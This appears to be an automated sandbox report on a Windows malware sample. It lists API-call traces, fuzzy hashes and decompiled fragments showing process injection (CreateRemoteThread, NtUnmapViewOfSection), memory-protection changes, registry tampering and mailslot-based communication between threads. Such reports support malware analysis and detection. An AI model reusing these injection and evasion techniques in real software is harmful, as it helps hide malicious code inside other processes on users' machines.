  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B314CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
